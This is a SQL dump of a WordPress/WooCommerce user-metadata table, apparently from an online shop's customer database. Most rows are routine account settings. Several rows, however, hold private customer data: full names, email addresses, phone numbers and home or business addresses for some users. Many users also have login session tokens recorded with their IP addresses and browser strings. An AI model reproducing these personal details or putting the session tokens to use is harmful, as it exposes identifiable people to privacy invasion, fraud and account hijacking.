INSERT INTO `wp_usermeta` VALUES (2550, 133, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2551, 133, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2552, 133, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2553, 133, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2554, 133, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2555, 133, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2556, 133, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2557, 133, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2558, 133, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2559, 133, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2560, 133, '_yoast_wpseo_profile_updated', '1478005712'); 
INSERT INTO `wp_usermeta` VALUES (2562, 133, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2563, 134, 'nickname', 'rick737'); 
INSERT INTO `wp_usermeta` VALUES (2564, 134, 'first_name', 'Rick'); 
INSERT INTO `wp_usermeta` VALUES (2565, 134, 'last_name', 'Cash'); 
INSERT INTO `wp_usermeta` VALUES (2566, 134, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2567, 134, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2568, 134, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2569, 134, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2570, 134, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2571, 134, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2572, 134, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2573, 134, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2574, 134, '_yoast_wpseo_profile_updated', '1478034761'); 
INSERT INTO `wp_usermeta` VALUES (2576, 134, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2577, 134, 'billing_first_name', 'Rick'); 
INSERT INTO `wp_usermeta` VALUES (2578, 134, 'billing_last_name', 'Cash'); 
INSERT INTO `wp_usermeta` VALUES (2579, 134, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2580, 134, 'billing_email', 'rick737@att.net'); 
INSERT INTO `wp_usermeta` VALUES (2581, 134, 'billing_phone', '3367751436'); 
INSERT INTO `wp_usermeta` VALUES (2582, 134, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (2583, 134, 'billing_address_1', '415 Twin Valley Drive'); 
INSERT INTO `wp_usermeta` VALUES (2584, 134, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2585, 134, 'billing_city', 'Clemmons'); 
INSERT INTO `wp_usermeta` VALUES (2586, 134, 'billing_state', 'NC'); 
INSERT INTO `wp_usermeta` VALUES (2587, 134, 'billing_postcode', '27012'); 
INSERT INTO `wp_usermeta` VALUES (2588, 134, 'last_update', '1478035138'); 
INSERT INTO `wp_usermeta` VALUES (2590, 135, 'nickname', 'customerservice'); 
INSERT INTO `wp_usermeta` VALUES (2591, 135, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2592, 135, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2593, 135, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2594, 135, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2595, 135, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2596, 135, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2597, 135, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2598, 135, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2599, 135, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2600, 135, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2601, 135, '_yoast_wpseo_profile_updated', '1478042177'); 
INSERT INTO `wp_usermeta` VALUES (2602, 135, 'session_tokens', 'a:1:{s:64:"6cb6f561467dc207e0a6e7687bec177e8d7c5b37c8e3e51188cf96213eaa5d9d";a:4:{s:10:"expiration";i:1479251777;s:2:"ip";s:13:"184.177.74.76";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1478042177;}}'); 
INSERT INTO `wp_usermeta` VALUES (2603, 135, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2604, 136, 'nickname', 'medmondson'); 
INSERT INTO `wp_usermeta` VALUES (2605, 136, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2606, 136, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2607, 136, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2608, 136, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2609, 136, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2610, 136, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2611, 136, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2612, 136, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2613, 136, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2614, 136, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2615, 136, '_yoast_wpseo_profile_updated', '1478099724'); 
INSERT INTO `wp_usermeta` VALUES (2616, 136, 'session_tokens', 'a:1:{s:64:"38aa2ed8c8fc7312890e78c6ab87eaa3965a2a4adc9b233bf7df5449b4da13b6";a:4:{s:10:"expiration";i:1479309325;s:2:"ip";s:13:"23.228.141.40";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1478099725;}}'); 
INSERT INTO `wp_usermeta` VALUES (2617, 136, 'billing_first_name', 'Todd'); 
INSERT INTO `wp_usermeta` VALUES (2618, 136, 'billing_last_name', 'Daniels'); 
INSERT INTO `wp_usermeta` VALUES (2619, 136, 'billing_company', 'Pivot International, Inc.'); 
INSERT INTO `wp_usermeta` VALUES (2620, 136, 'billing_email', 'medmondson@pivotint.com'); 
INSERT INTO `wp_usermeta` VALUES (2621, 136, 'billing_phone', '9133126910'); 
INSERT INTO `wp_usermeta` VALUES (2622, 136, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (2623, 136, 'billing_address_1', '10932 STRANG LINE RD'); 
INSERT INTO `wp_usermeta` VALUES (2624, 136, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2625, 136, 'billing_city', 'Lenexa'); 
INSERT INTO `wp_usermeta` VALUES (2626, 136, 'billing_state', 'KS'); 
INSERT INTO `wp_usermeta` VALUES (2627, 136, 'billing_postcode', '662152322'); 
INSERT INTO `wp_usermeta` VALUES (2628, 136, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2629, 137, 'nickname', 'ebisel'); 
INSERT INTO `wp_usermeta` VALUES (2630, 137, 'first_name', 'Eric'); 
INSERT INTO `wp_usermeta` VALUES (2631, 137, 'last_name', 'Bisel'); 
INSERT INTO `wp_usermeta` VALUES (2632, 137, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2633, 137, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2634, 137, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2635, 137, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2636, 137, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2637, 137, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2638, 137, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2639, 137, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2640, 137, '_yoast_wpseo_profile_updated', '1478107807'); 
INSERT INTO `wp_usermeta` VALUES (2641, 137, 'session_tokens', 'a:1:{s:64:"679e93c84ac0fcb156904e2fb7e6d2d6e377d421c20d213d9680acf98c88bf39";a:4:{s:10:"expiration";i:1479317408;s:2:"ip";s:15:"107.135.200.133";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478107808;}}'); 
INSERT INTO `wp_usermeta` VALUES (2642, 137, 'last_update', '1478108704'); 
INSERT INTO `wp_usermeta` VALUES (2643, 137, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2644, 138, 'nickname', 'pete'); 
INSERT INTO `wp_usermeta` VALUES (2645, 138, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2646, 138, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2647, 138, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2648, 138, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2649, 138, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2650, 138, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2651, 138, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2652, 138, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2653, 138, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2654, 138, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2655, 138, '_yoast_wpseo_profile_updated', '1478110051'); 
INSERT INTO `wp_usermeta` VALUES (2656, 138, 'session_tokens', 'a:2:{s:64:"d2cd5abc34dd7b53afa5077575964dfdc48d1f9c51e74c6e94ae4d23279ab559";a:4:{s:10:"expiration";i:1479319651;s:2:"ip";s:12:"72.4.203.130";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478110051;}s:64:"6a8f79cdc4f2024a39f6a8c2a1739e4fc839c0d29a22ed946c8d35d9e0e73f5e";a:4:{s:10:"expiration";i:1479409599;s:2:"ip";s:12:"72.4.203.130";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1478199999;}}'); 
INSERT INTO `wp_usermeta` VALUES (2657, 138, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2658, 139, 'nickname', 'christinaurias-1'); 
INSERT INTO `wp_usermeta` VALUES (2659, 139, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2660, 139, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2661, 139, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2662, 139, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2663, 139, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2664, 139, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2665, 139, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2666, 139, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2667, 139, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2668, 139, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2669, 139, '_yoast_wpseo_profile_updated', '1478118989'); 
INSERT INTO `wp_usermeta` VALUES (2670, 139, 'session_tokens', 'a:1:{s:64:"2b1ef52ee6eb26a399d958cd7b2e2107891aebd0e1f75b74c3c1b56302c00533";a:4:{s:10:"expiration";i:1479328590;s:2:"ip";s:13:"130.134.82.15";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478118990;}}'); 
INSERT INTO `wp_usermeta` VALUES (2671, 139, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2672, 140, 'nickname', 'swebb'); 
INSERT INTO `wp_usermeta` VALUES (2673, 140, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2674, 140, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2675, 140, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2676, 140, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2677, 140, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2678, 140, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2679, 140, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2680, 140, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2681, 140, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2682, 140, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2683, 140, '_yoast_wpseo_profile_updated', '1478191414'); 
INSERT INTO `wp_usermeta` VALUES (2684, 140, 'session_tokens', 'a:1:{s:64:"ebd7f0def1a9bff2316dd3b8015616fd3cf655af6ec48b33a3ce22c7f65390a2";a:4:{s:10:"expiration";i:1479401015;s:2:"ip";s:14:"24.199.139.104";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1478191415;}}'); 
INSERT INTO `wp_usermeta` VALUES (2685, 140, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2686, 141, 'nickname', 'RACHEL.HORN'); 
INSERT INTO `wp_usermeta` VALUES (2687, 141, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2688, 141, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2689, 141, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2690, 141, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2691, 141, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2692, 141, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2693, 141, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2694, 141, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2695, 141, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2696, 141, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2697, 141, '_yoast_wpseo_profile_updated', '1478192269'); 
INSERT INTO `wp_usermeta` VALUES (2698, 141, 'session_tokens', 'a:1:{s:64:"ff3b059f72ab931b1af081ed53185d8f10ef2175b6050ddbc34f409d75e376f0";a:4:{s:10:"expiration";i:1479401870;s:2:"ip";s:14:"204.76.197.133";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1478192270;}}'); 
INSERT INTO `wp_usermeta` VALUES (2699, 141, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2700, 142, 'nickname', 'wrmillard'); 
INSERT INTO `wp_usermeta` VALUES (2701, 142, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2702, 142, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2703, 142, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2704, 142, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2705, 142, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2706, 142, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2707, 142, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2708, 142, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2709, 142, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2710, 142, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2711, 142, '_yoast_wpseo_profile_updated', '1478195165'); 
INSERT INTO `wp_usermeta` VALUES (2712, 142, 'session_tokens', 'a:1:{s:64:"57d4fa1ceb6723ee6bd65470bc603564c35fa9a6b46933a71e329c72f9f2f41f";a:4:{s:10:"expiration";i:1479404765;s:2:"ip";s:12:"65.157.77.67";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0";s:5:"login";i:1478195165;}}'); 
INSERT INTO `wp_usermeta` VALUES (2713, 142, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2714, 143, 'nickname', 'jlevin'); 
INSERT INTO `wp_usermeta` VALUES (2715, 143, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2716, 143, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2717, 143, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2718, 143, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2719, 143, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2720, 143, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2721, 143, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2722, 143, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2723, 143, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2724, 143, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2725, 143, '_yoast_wpseo_profile_updated', '1478201579'); 
INSERT INTO `wp_usermeta` VALUES (2726, 143, 'session_tokens', 'a:1:{s:64:"fdc92f7193fbf5f007151ead9454c69529ee961aad395373cc038b7bed4ecfa6";a:4:{s:10:"expiration";i:1479411179;s:2:"ip";s:14:"173.166.13.101";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478201579;}}'); 
INSERT INTO `wp_usermeta` VALUES (2727, 144, 'nickname', 'raygalletfw3087'); 
INSERT INTO `wp_usermeta` VALUES (2728, 144, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2729, 144, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2730, 144, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2731, 144, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2732, 144, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2733, 144, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2734, 144, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2735, 144, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2736, 144, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2737, 144, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2738, 144, '_yoast_wpseo_profile_updated', '1478239777'); 
INSERT INTO `wp_usermeta` VALUES (2739, 144, 'session_tokens', 'a:1:{s:64:"ffcddad2e9645d741e977387a4bf4f646050527022270f1d91add301a792f499";a:4:{s:10:"expiration";i:1479449377;s:2:"ip";s:13:"185.116.45.78";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1478239777;}}'); 
INSERT INTO `wp_usermeta` VALUES (2740, 144, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2741, 3, 'closedpostboxes_post', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (2742, 3, 'manageedit-nf_subcolumnshidden', 'a:3:{i:0;s:16:"form_11_field_15";i:1;s:16:"form_11_field_16";i:2;s:8:"ridwpaid";}'); 
INSERT INTO `wp_usermeta` VALUES (2743, 145, 'nickname', 'tylerrowe2020'); 
INSERT INTO `wp_usermeta` VALUES (2744, 145, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2745, 145, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2746, 145, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2747, 145, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2748, 145, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2749, 145, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2750, 145, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2751, 145, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2752, 145, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2753, 145, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2754, 145, '_yoast_wpseo_profile_updated', '1478292571'); 
INSERT INTO `wp_usermeta` VALUES (2755, 145, 'session_tokens', 'a:1:{s:64:"fb54e8c41010a1f984620b7ed4ab5bb7b998f513280a6dcc0e2ff96615a6a8a8";a:4:{s:10:"expiration";i:1479502171;s:2:"ip";s:11:"75.1.43.144";s:2:"ua";s:137:"Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1";s:5:"login";i:1478292571;}}'); 
INSERT INTO `wp_usermeta` VALUES (2756, 146, 'nickname', 'sds'); 
INSERT INTO `wp_usermeta` VALUES (2757, 146, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2758, 146, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2759, 146, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2760, 146, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2761, 146, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2762, 146, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2763, 146, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2764, 146, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2765, 146, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2766, 146, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2767, 146, '_yoast_wpseo_profile_updated', '1478365848'); 
INSERT INTO `wp_usermeta` VALUES (2768, 146, 'session_tokens', 'a:1:{s:64:"aae0bb97bd2f1404c5b47bc697cfa05f2adb6563e4d969af7ab7bc5cd8090ad4";a:4:{s:10:"expiration";i:1479575449;s:2:"ip";s:14:"115.248.29.163";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1478365849;}}'); 
INSERT INTO `wp_usermeta` VALUES (2769, 147, 'nickname', 'stephanie.yeaman'); 
INSERT INTO `wp_usermeta` VALUES (2770, 147, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2771, 147, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2772, 147, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2773, 147, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2774, 147, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2775, 147, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2776, 147, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2777, 147, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2778, 147, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2779, 147, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2780, 147, '_yoast_wpseo_profile_updated', '1478513008'); 
INSERT INTO `wp_usermeta` VALUES (2781, 147, 'session_tokens', 'a:1:{s:64:"9f5e0cf6e875ebddc3ac65feb6dc87b94740e1c571e2cf213e5e6af75ef49c62";a:4:{s:10:"expiration";i:1479722609;s:2:"ip";s:14:"141.170.11.172";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478513009;}}'); 
INSERT INTO `wp_usermeta` VALUES (2782, 148, 'nickname', 'jan.plomp'); 
INSERT INTO `wp_usermeta` VALUES (2783, 148, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2784, 148, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2785, 148, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2786, 148, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2787, 148, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2788, 148, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2789, 148, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2790, 148, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2791, 148, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2792, 148, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2793, 148, '_yoast_wpseo_profile_updated', '1478525235'); 
INSERT INTO `wp_usermeta` VALUES (2796, 149, 'nickname', 'tstage'); 
INSERT INTO `wp_usermeta` VALUES (2797, 149, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2798, 149, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2799, 149, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2800, 149, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2801, 149, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2802, 149, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2803, 149, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2804, 149, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2805, 149, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2806, 149, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2807, 149, '_yoast_wpseo_profile_updated', '1478531823'); 
INSERT INTO `wp_usermeta` VALUES (2808, 149, 'session_tokens', 'a:1:{s:64:"b2a53dcd2d83975f9a6a7e4594a87af38bc0a48f67d911db2de5c7a046a2ca5a";a:4:{s:10:"expiration";i:1479741424;s:2:"ip";s:12:"72.95.230.14";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0";s:5:"login";i:1478531824;}}'); 
INSERT INTO `wp_usermeta` VALUES (2809, 149, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2810, 150, 'nickname', 'rennis85'); 
INSERT INTO `wp_usermeta` VALUES (2811, 150, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2812, 150, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2813, 150, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2814, 150, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2815, 150, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2816, 150, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2817, 150, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2818, 150, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2819, 150, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2820, 150, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2821, 150, '_yoast_wpseo_profile_updated', '1478533269'); 
